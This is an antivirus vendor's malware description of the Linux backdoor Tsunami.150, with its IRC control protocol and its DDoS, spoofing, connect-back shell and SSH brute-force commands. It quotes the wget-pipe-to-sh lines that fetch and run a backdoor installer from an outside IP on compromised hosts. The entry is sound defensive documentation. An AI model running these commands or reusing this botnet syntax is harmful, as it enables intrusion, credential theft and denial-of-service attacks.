Library
My library

+ Add to library

Profile

Linux.BackDoor.Tsunami.150

Added to the Dr.Web virus database: 2015-07-23

Virus description added:

SHA1:

  • 3a99f7816c6864fd36ceea3380e591d337b0b241 (unpacked)
  • 691704fb9de3e1d4a6c5b84b99be71ef375257a8 (packed)

Backdoor for Linux OSes that gets installed on the system by Linux.PNScan.1. It uses "/var/run/.boss.pid" as a lock file.

To connect to the IRC server, the Trojan generates the name and nickname string as follows:

m64|dog|root|%c%c%c%c%c%c%c%c%c

where %c indicates a random number from the "0123456789" set.

If connection attempt is successful, the malicious program sends the following commands to the server:

NICK <nick>\n
USER x00 localhost localhost :dogscan\n

where <nick> indicates a nickname generated as described above.

While establishing a connection to the IRC server, the malicious program waits for incoming commands. The backdoor can execute the following commands:

CommandActionComments
352Set a fake IP
376Join the channelSend(fd, "MODE %s -xi\n", nick);
Send(fd, "MODE %s +B\n", nick);
Send(fd, "JOIN %s :%s\n", chan, pass);
433Generate a new nickname
ERRORGenerate a new nickname
422Join the channelSend(fd, "MODE %s -xi\n", nick);
Send(fd, "MODE %s +B\n", nick);
Send(fd, "JOIN %s :%s\n", chan, pass);
NICKTake a string from the command as a nickname
PINGSend PONG
PRIVMSGExecute a special command

Moreover, the Trojan can execute a number of extended commands.

CommandActionSyntax
RANDOMFLOODRandomly switch between ACK and SYN FloodRANDOMFLOOD <target> <port> <secs>
NSACKFLOODACK FloodNSACKFLOOD <target> <port> <secs>
NSSYNFLOODSYN FloodNSSYNFLOOD <target> <port> <secs>
ACKFLOODACK Flood (spoofed)
SYNFLOODSYN Flood (spoofed)SYNFLOOD <target> <port> <secs>
UDPUDP FloodUDP <target> <port> <secs>
UNKNOWNLaunch a DDoS attackUNKNOWN <target> <secs>
SERVERChange the server to the one specified in the command
GETSPOOFSGet spoofing parameters
SPOOFSSet an IP or an IP range for spoofingSPOOFS <iprange/ip>
GETDownload a specified fileGET <url> <save as>
VERSIONReturn backdoor's version
KILLALLTerminate a DDoS attack
HELPDisplay the list of available commands
CBACKConnect backCBACK <ip> <port> connectback shell
SCANRNDBrute-force SSH credentials (random IP addresses are chosen from an IP range, and a standard dictionary is used)SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes>
SCANRND2Brute-force SSH credentials (random IP addresses are chosen from an IP range, and a dictionary specified in the incoming parameters is used)SCANRND2 <192 or 192.168 or 192.168.0> <threads> <minutes> <user> <passwd>
SCANSUBBrute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a standard dictionary)SCANSUB <192.168> <threads>
SCANSUB2Brute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a dictionary specified in the incoming parameters)SCANSUB2 <192.168> <threads> <user> <passwd>
DOGRNDBrute-force SSH credentials (random IP addresses are chosen from an IP range, and a standard dictionary is used)DOGRND <192 or 192.168 or 192.168.0> <threads> <minutes>
DOGSUBBrute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a standard dictionary)DOGSUB <192.168> <threads>
IRCSend specified IRC commands to the serverIRC <arg1> <arg2> <arg...>
SHExecute a set of SH commandsSH <arg1> <arg2> <arg...>

Once the login:password combination is found, SCANRND, SCANRND2, SCANSUB, SCANSUB2 execute the following command on the remote system:

wget -qO - http://104.199.135.124/bbsh | sh > /dev/null 2>↦1

or

wget -qO - http://104.199.135.124/wgsh | sh > /dev/null 2>↦1 

Downloaded scripts install Linux.BackDoor.Tsunami.144 on the system.

Once the login:password combination is found, DOGRND, DOGSUB execute the following command:

uname -a || echo - 

After that, the "##scaninfo##" user receives the following information in the IRC chat:

[g+] <login>@<ip> | <password> | <os> \n

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number